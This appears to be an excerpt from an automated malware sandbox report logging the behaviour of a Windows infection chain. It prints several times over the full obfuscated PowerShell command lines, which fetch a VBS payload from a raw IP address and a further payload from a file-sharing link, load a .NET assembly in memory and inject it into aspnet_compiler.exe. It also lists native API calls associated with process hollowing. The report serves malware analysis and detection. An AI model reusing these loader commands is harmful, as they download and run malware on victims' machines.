Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Memory allocated: 770B0000 page execute and read and write

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_0042C4A3 NtClose,	27_2_0042C4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,	27_2_00A707AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F9F0 NtClose,LdrInitializeThunk,	27_2_00A6F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,	27_2_00A6FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_00A6FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,	27_2_00A6FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A700C4 NtCreateFile,	27_2_00A700C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70060 NtQuerySection,	27_2_00A70060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70078 NtResumeThread,	27_2_00A70078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70048 NtProtectVirtualMemory,	27_2_00A70048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A701D4 NtSetValueKey,	27_2_00A701D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A7010C NtOpenDirectoryObject,	27_2_00A7010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A70C40 NtGetContextThread,	27_2_00A70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A710D0 NtOpenProcessToken,	27_2_00A710D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71148 NtOpenThread,	27_2_00A71148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F8CC NtWaitForSingleObject,	27_2_00A6F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A71930 NtSetContextThread,	27_2_00A71930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F938 NtWriteFile,	27_2_00A6F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6F900 NtReadFile,	27_2_00A6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAB8 NtQueryValueKey,	27_2_00A6FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FAD0 NtAllocateVirtualMemory,	27_2_00A6FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FA20 NtQueryInformationFile,	27_2_00A6FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FA50 NtEnumerateValueKey,	27_2_00A6FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FBB8 NtQueryInformationToken,	27_2_00A6FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FBE8 NtQueryVirtualMemory,	27_2_00A6FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FB50 NtCreateKey,	27_2_00A6FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC90 NtUnmapViewOfSection,	27_2_00A6FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC30 NtOpenProcess,	27_2_00A6FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 27_2_00A6FC60 NtMapViewOfSection,	27_2_00A6FC60
